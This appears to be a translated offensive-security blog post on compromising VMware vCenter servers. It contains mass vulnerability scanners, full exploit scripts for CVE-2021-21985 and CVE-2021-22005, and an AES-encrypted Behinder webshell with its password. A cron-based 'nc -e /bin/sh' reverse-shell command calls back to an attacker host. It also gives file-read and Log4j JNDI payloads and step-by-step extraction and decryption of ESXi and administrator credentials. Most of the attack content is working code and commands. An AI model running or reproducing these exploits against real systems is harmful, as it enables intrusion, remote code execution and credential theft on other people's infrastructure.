foreword
VMware vCenter is a centralized virtualization management platform launched by VMware. It is one of the core components of the VMware vSphere virtualization solution. The main function of vCenter is to manage and monitor the entire vSphere virtualization infrastructure, including multiple ESXi hosts and virtual machines.
vSphere
vSphere is the general name of VMware's virtualization platform. It is a complete set of virtualization solutions, including multiple components and functions, used to build and manage virtualization environments. The major components of vSphere include:
- VMware ESXi (formerly known as ESX): ESXi is a core part of vSphere, which is a bare-metal virtualization operating system that is installed directly on a physical server, replacing traditional operating systems such as Windows or Linux. Once ESXi is installed and started on a physical server, it runs automatically in the background and immediately begins managing and running virtual machines without requiring interaction through a login interface.
- VMware vCenter Server: vCenter is a centralized management platform for vSphere, used to manage and monitor virtual machines on multiple ESXi hosts. vCenter provides a web interface or vSphere client for administrators to log in, and then manage the entire vSphere environment through this interface.
The commonly seen "VMware® vSphere" login interface usually refers to the login interface of vCenter. ESXi does not have a separate login interface
vSphere = ESXi + vCenter
fofa search
title="+ ID_VC_Welcome +"View vcenter version
method 1:
/sdk/vimServiceVersions.xmlThe following represents the version as 6.7.3.
Method 2:
By calling the SOAP API of the VMWare Sphere component, its version information can be obtained, and the XML data is as follows:
POST /sdk HTTP/1.1
Host: portal.vpsssd.vn:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 579
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soap:Header>
<operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
<RetrieveServiceContent
xmlns="urn:internalvim25">
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</soap:Body>
</soap:Envelope>
loophole
CVE-2021-21972 File Upload
Vulnerability introduction
vSphere Client (HTML5 has a remote code execution vulnerability in the vCenter Server plug-in. An unauthorized attacker can send a carefully crafted request to vCenterServer through a server with port 443 open, thereby writing a webshell on the server, and eventually causing remote arbitrary code execution .
Sphere of influence
- vCenter Server7.0 =< 7.0.U1c
- vCenter Server6.7 =< 6.7.U3l
- vCenter Server6.5 =< 6.5.U3n
vulnerability detection
Visit the following path, if 404, it means there is no vulnerability, if 405, there may be a vulnerability
/ui/vropspluginui/rest/services/uploadova
import requests, threading
import concurrent.futures
lock = threading.Lock() # 创建互斥锁
requests.packages.urllib3.disable_warnings()
from colorama import init,Fore
init(autoreset=True)
lock = threading.Lock()
def run(target):
try :
target = target + "/ui/vropspluginui/rest/services/uploadova"
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}
resp = requests.get(url=target, headers=header, verify=False, proxies={'https':'http://127.0.0.1:8080'})
code = resp.status_code
if code == 405:
with lock:
print("[+]%s可能存在漏洞" %target)
else:
with lock:
print("[-]%s不存在漏洞" %target)
except Exception as e:
with lock:
print("[-]%s不存在漏洞" %target)
if __name__ == "__main__":
urls = [url.strip() for url in open("url.txt", "r", encoding="utf-8")]
max_workers = 800
with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
executor.map(run, urls)exploit
vckiller_windows_amd64.exe -u https://ip:8443 -m 21972 -f shell.jsp
CVE-2021-21985 RCE
Vulnerability introduction
The Virtual SAN Health Check plug-in (vsan-h5-client.zip) enabled by default has unauthorized access to the /rest/* interface, which can use unsafe reflection calls to implement RCE.
Affected version
- 7.0 <= vCenter Server < 7.0 U2b
- 6.7 <= vCenter Server < 6.7 U3n
- 6.5 <= vCenter Server < 6.5 U3p
- 4.x <= Cloud Foundation (vCenter Server) < 4.2.1
- 3.x <= Cloud Foundation (vCenter Server) < 3.10.2.1
vulnerability detection
POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: 54.xx.xx.157
User-Agent: python-requests/2.30.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 88
{"methodInput": [{"type": "ClusterComputeResource", "value": null, "serverGuid": null}]}
When the return is as follows, it means that the vulnerability exists
command execution
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import base64
import sys
import zipfile
from urllib.parse import urlparse
import zlib
import json
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies={'https':'http://127.0.0.1:8080'}
def banner():
print("""
==============================================================
_____ _ _____ _____ ______
/ ____| | | | __ \ / ____| ____|
__ _| | ___ _ __ | |_ ___ _ __ | |__) | | | |__
\ \ / / | / _ \ '_ \| __/ _ \ '__| | _ /| | | __|
\ V /| |___| __/ | | | || __/ | | | \ \| |____| |____
\_/ \_____\___|_| |_|\__\___|_| |_| \_\\_____|______|
Powered by r0cky Team ZionLab
==============================================================
""")
def create_xml():
print("[*] Create Xml to offline_bundle.xml ...")
context = """<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value><![CDATA[ {cmd} 2>&1 ]]></value>
</list>
</constructor-arg>
</bean>
<bean id="is" class="java.io.InputStreamReader">
<constructor-arg>
<value>#{pb.start().getInputStream()}</value>
</constructor-arg>
</bean>
<bean id="br" class="java.io.BufferedReader">
<constructor-arg>
<value>#{is}</value>
</constructor-arg>
</bean>
<bean id="collectors" class="java.util.stream.Collectors"></bean>
<bean id="system" class="java.lang.System">
<property name="whatever" value="#{ system.setProperty("output", br.lines().collect(collectors.joining("\n"))) }"/>
</bean>
</beans>
""".replace("{cmd}", cmd)
with open('offline_bundle.xml', 'w') as wf:
wf.write(context)
wf.flush()
def create_zip():
print("[*] Create Zip to offline_bundle.zip ...")
with zipfile.ZipFile('offline_bundle.zip', 'w', zipfile.ZIP_DEFLATED) as zp:
zp.write('offline_bundle.xml')
def toBase64():
with open('offline_bundle.zip', 'rb') as rf:
return base64.b64encode(rf.read())
def poc1(url):
ssrf_str = "https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,{}%23"
ssrf = ssrf_str.format(bytes.decode(toBase64()))
print ("[*] Get XML to SystemProperties ...")
target = url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"
data = {"methodInput":[[ssrf]]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
def poc2(url):
print("[*] getProperty ...")
target = url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"
data = {"methodInput": ["output", None]}
r = requests.post(target, data=json.dumps(data), headers=headers,
verify=False, proxies=proxies)
if "result" in r.json():
print("[+] Command:", cmd)
print(r.json()['result'])
else:
print ("[-] send payload failed.")
headers = {"Content-Type": "application/json"}
def main(url):
try:
create_xml()
create_zip()
poc1(url)
poc2(url)
except:
print("[-] send payload failed.")
if __name__ == '__main__':
banner()
try:
target = sys.argv[1]
cmd = sys.argv[2]
up = urlparse(target)
target = up.scheme + "://" + up.netloc
main(target)
except:
print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")
Rebound shell: CVE-2021-21985: VMware vCenter Server RCE recurrence - Tencent Cloud Developer Community - Tencent Cloud
CVE-2021-22005 file upload
Vulnerability introduction
On September 22, 2021, VMware officially released a security bulletin, disclosing several medium-to-high-risk serious vulnerabilities including the CVE-2021-22005 VMware vCenter Server arbitrary file upload vulnerability. Attackers can construct malicious requests and upload malicious files through the Analytics service in vCenter, thereby causing remote code execution vulnerabilities.
Sphere of influence
- VMware vCenter Server 7.0 series < 7.0 U2c
- VMware vCenter Server 6.7 series < 6.7 U3o
- VMware vCenter Server 6.5 Series Not Affected by Vulnerabilities
vulnerability detection
Visit the /analytics/telemetry/ph/api/level address to determine whether the server is affected
- If the server responds with a 200/OK and anything other than "OFF" in the response body (eg "FULL"), it is vulnerable.
- If it responds with a 200/OK and a body content of "OFF", it is most likely not vulnerable and is also unpatched and has no workarounds applied.
- Other circumstances indicate that the vulnerability does not exist
import requests, threading
import concurrent.futures
lock = threading.Lock() # 创建互斥锁
requests.packages.urllib3.disable_warnings()
from colorama import init,Fore
init(autoreset=True)
lock = threading.Lock()
def run(target):
try :
target = target + "/analytics/telemetry/ph/api/level?_c=test"
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}
resp = requests.get(url=target, headers=header, verify=False, proxies={'https':'http://127.0.0.1:8080'})
code = resp.status_code
if code == 200 and "OFF" not in resp.text and "FULL" in resp.text:
with lock:
print("[+]%s可能存在漏洞" %target)
else:
with lock:
print("[-]%s不存在漏洞" %target)
except Exception as e:
with lock:
print("[-]%s不存在漏洞" %target)
if __name__ == "__main__":
urls = [url.strip() for url in open("url.txt", "r", encoding="utf-8")]
max_workers = 800
with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
executor.map(run, urls)exploit
import requests
import random
import string
import sys
import time
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
_str = _str.replace("&", "&")
_str = _str.replace("<", "<")
_str = _str.replace(">", ">")
_str = _str.replace("\"", """)
return _str
def str_to_escaped_unicode(arg_str):
escaped_str = ''
for s in arg_str:
val = ord(s)
esc_uni = "\\u{:04x}".format(val)
escaped_str += esc_uni
return escaped_str
def createAgent(target, agent_name, log_param):
url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param)
headers = { "Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"X-Deployment-Secret": "abc",
"Content-Type": "application/json",
"Connection": "close" }
json_data = { "manifestSpec":{},
"objectType": "a2",
"collectionTriggerDataNeeded": True,
"deploymentDataNeeded":True,
"resultNeeded": True,
"signalCollectionCompleted":True,
"localManifestPath": "a7",
"localPayloadPath": "a8",
"localObfuscationMapPath": "a9" }
requests.post(url, headers=headers, json=json_data, verify=False)
def generate_manifest(webshell_location, webshell):
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
#set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))##
#set($orig_log = $appender.getFile())##
#set($logger = $GLOBAL-logger.logger.parent)##
$appender.setFile("%s")##
$appender.activateOptions()##
$logger.warn("%s")##
$appender.setFile($orig_log)##
$appender.activateOptions()##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (webshell_location, webshell)
return manifestData
def arg():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help = "Target", required = True)
args = parser.parse_args()
target = args.target
print("[*] Target: %s" % target)
return target
def exec():
target = arg()
# Variables
webshell_param = id_generator(6)
log_param = id_generator(6)
agent_name = id_generator(6)
shell_name = "Server.jsp"
webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"""
webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name
webshell = str_to_escaped_unicode(webshell)
manifestData = generate_manifest(webshell_location,webshell)
print("[*] Creating Agent")
createAgent(target, agent_name, log_param)
url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param)
headers = {"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0",
"X-Deployment-Secret": "abc",
"Content-Type": "application/json",
"Connection": "close"}
json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(url, headers=headers, json=json_data, verify=False)
#webshell连接地址
url = "%s/idm/..;/%s" % (target, shell_name)
code = requests.get(url=url, headers=headers,verify=False).status_code
if code != "404":
print("webshell地址: %s" % url)
print("[*]冰蝎3.0 Webshell连接密码: rebeyond" )
else:
print("未获取到webshell地址")
if __name__ == '__main__':
exec()CVE-2021-22005poc.py -t https://103.154.100.22:8443
rebound shell
There is another way to use it, directly writing the rebound script into the scheduled task
curl -kv "https:/xx.xx.xx.xx/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh vpsip地址 6666"Receiving a rebound shell
vCenter SSRF file read vulnerability
Vulnerability description
There is an unauthorized SSRF vulnerability in some versions of VMware vCenter v 7.0.x. The vulnerability originates from the fact that the getProviderLogo function of the h5-vcav-bootstrap-service component does not verify the provider-logo parameter, and the URL request is made after direct splicing. Any file can be read through the file protocol. No CVE number yet
Affected version
- VMware vCenter Server =7.0.2.00100
- VMware vCenter Server =7.0.2.00000
- 7.0.1.1
vulnerability detection
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://c:\windows\System32\drivers\etc\hosts
#读取 postgresql 配置文件:
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/vmware-vpx/vcdb.propertiesGET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd HTTP/1.1
Host: 54.xx.xx.157
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
vCenter Arbitrary file read
Vulnerability Details
There is an arbitrary file read vulnerability in a specific version of VMware vCenter. An attacker can read arbitrary files on the server by constructing a specific request.
Affected version
- VMware vCenter 6.5.0a-f
- Security version: VMware vCenter 6.5u1
Vulnerability recurrence
https://ip/eam/vib?id=/etc/passwd
/etc/shadow cannot be read
VCenter Log4j JNDI RCE CVE-2021-44228
Vulnerability Details
VMware vCenter Log4j JNDI RCE is a potential remote code execution vulnerability affecting VMware vCenter Server 6.7. This vulnerability is caused by improper configuration of Log4j on the vCenter Server platform. An attacker could exploit this vulnerability to execute arbitrary code remotely. The trigger point of the vulnerability is the XFF header
vulnerability detection
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: ${jndi:ldap://x.25vk6n.ceye.io}
Connection: close
I didn't find a target machine with a vulnerability here, so there is no record, and I only demonstrate the testing process. Because the essence of the vulnerability belongs to Log4j, vcenter refers to the log4j component, so if there is such a vulnerability, ordinary lo4j detection tools should be able to detect it
exploit
Tool usage: VcenterKiller
For more details refer to:
- https://www.cnblogs.com/pt007/p/17032454.html
- Qi Anxin Offensive and Defense Community-Summary of Vcenter Utilization in Actual Combat
vcenter comprehensive utilization tool
VcenterKiller: GitHub - Schira4396/VcenterKiller: A comprehensive utilization tool for Vcenter, including the most mainstream CVE-2021-21972, CVE-2021-21985 and CVE-2021-22005, One Access's CVE-2022-22954, CVE -2022-22972/31656 and log4j, provide one-click upload webshell, command execution or upload public key using SSH password-free connection , only vulnerability exploitation, no vulnerability detection function.
Obtain vcenter-web console permission
Last time I obtained the server permission where vcenter is located, but I still cannot log in to the control platform, and a password is required to log in.
At this time, there are two ideas:
- Read the vCenter cookie, decrypt it through the decryption script, and log on to the console.
- Modify the password directly through vdcadmintool.exe. However, the original password cannot be obtained after modification, and the administrator will find that the password has been changed.
cookie login
SAML certificate login is essentially to get the cookie and log in to the web console
The vSphere 5.0 release introduces SSO with support for using SAML as an authorization service. When a user logs into the service, the service forwards the authentication request to SAML. SAML verifies that user credentials are correct and that they are authorized to access specified services.
Extract the IdP certificate from /storage/db/vmware-vmdir/data.mdb in vCenter, create a SAML request for the admin user, and finally authenticate with the vCenter server and get a valid admin cookie.
First you need to get the database file from vCenter:
- Linux:/storage/db/vmware-vmdir/data.mdb
- Windows:C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb
Use the SAML decryption script to generate cookies. It is recommended to use kali to run the script. The modules in the script need to install the compilation tool and the OpenLDAP development kit before they can be used
sudo apt install python3-dev libldap2-dev libsasl2-dev libssl-dev
#安装依赖
pip3 install -r requirements.txtrun
python3 vcenter_saml_login.py -p data.mdb -t vcenteripI made an error here, please refer to: Summary of Vcenter’s actual use methods - Tencent Cloud Developer Community - Tencent Cloud
Get password without reset
1. View domain
#Linux
/usr/lib/vmware-vmafd/bin/vmafd-cli get-domain-name --server-name localhost
#windows
C:\Program Files\VMware\vCenter Server\vmafdd\vmafd-cli get-domain-name --server-name localhost
#由于路径中间存在空格,导致识别不了,使用双引号对含有空格的路径进行单独处理
C:\PROGRA~1\VMware\"vCenter Server"\vmafdd\vmafd-cli get-domain-name --server-name localhost
2. Obtain the decryption key
#Linux
cat /etc/vmware-vpx/ssl/symkey.dat
#Windows
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat
3. Obtain the database account password
The default database file of vcenter is stored in vcdb.properties, and the configuration file contains the plain text account password of the database
#Linux
cat /etc/vmware-vpx/vcdb.properties
cat /etc/vmware/service-state/vpxd/vcdb.properties
#Windows
type C:\ProgramData\VMware\"VMware VirtualCenter"\vcdb.properties
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
The default is the postgresql database, you can only log in locally on the vCenter server, and execute the statement to query the ESXI password
#psql默认存放位置
Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe
Linux:
#其中x版本号,根据实际情况填写
cd /opt/vmware/vpostgres/x版本/bin/
#执行语句查询
echo "psql密码" | psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;"
Copy the password field into the password.enc file
4. Use the script to decrypt
GitHub - shmilylty/vhost_password_decrypt: vhost password decrypt
- symkey.dat is the decryption key obtained in the second step
python decrypt.py symkey.dat password.enc password.txtAfter executing the script, a password.txt will be output, which stores the ESXI machine password corresponding to ip_address
My output here is empty
5. Use the password in password.txt to log in to the web console
reset Password
A faster method, but the original password cannot be obtained after modification, and the administrator will find that the password has been changed
#Linux
/usr/lib/vmware-vmdir/bin/vdcadmintool
#Windows
C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exeSelect option 3, enter the default [email protected] (requires administrator privileges), and it fails again. .
Get virtual machine permissions
After logging in to the web console, if you want to obtain the permission of a virtual machine, select the target virtual machine, generate a snapshot, find the snapshot file, and read the hash